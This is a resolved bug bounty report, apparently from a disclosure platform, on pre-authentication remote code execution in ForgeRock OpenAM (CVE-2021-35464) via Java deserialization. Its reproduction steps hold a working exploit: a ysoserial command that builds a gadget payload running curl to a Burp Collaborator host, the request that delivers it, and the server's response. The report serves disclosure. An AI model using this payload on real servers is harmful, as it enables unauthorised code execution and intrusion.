Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)
Severity: High
## Vulnerability Details
RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.
## Impact
An unauthenticated, third-party attacker can execute arbitrary code remotely on the OpenAM server.
### Supporting Material/References
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
## System Host(s)
█████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-35464
## Steps to Reproduce
Target domain: █████
First we need to build the payload:
1. Download the ysoserial jar:
   ```
   wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
   ```
2. Generate the serialized payload and save it to payload.txt:
   ```
   java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\n' > payload.txt
   ```
You need to change the Burp Collaborator ID to your own to test it properly.
The payload is now saved in the payload.txt file.
Now we need to send the following request:
```
GET /██████████=XYZ HTTP/1.1
Host: 127.0.0.1
```
Replace **XYZ** with the payload saved in the payload.txt file.
The response:
```
HTTP/1.1 302 302
Date: Thu, 01 Jul 2021 18:11:52 GMT
Server: Apache
Set-Cookie: session=expiry=1625163712945691;Max-Age=600;path=/;HttpOnly;Secure;
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: default-src 'unsafe-inline' 'self'; script-src 'unsafe-eval' 'unsafe-inline' 'self' https://██████████; img-src 'self' https://████████
Cache-Control: no-cache, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Cache-Control: private
Location: https://127.0.0.1:443/sso/base/AMInvalidURL
Content-Length: 0
X-XSS-Protection: 1; mode=block
```
The HTTP request received by the Collaborator:
█████
## Suggested Mitigation/Remediation Actions
## Report Stats
- Report ID: 1249456
- State: Closed
- Substate: resolved
- Upvotes: 7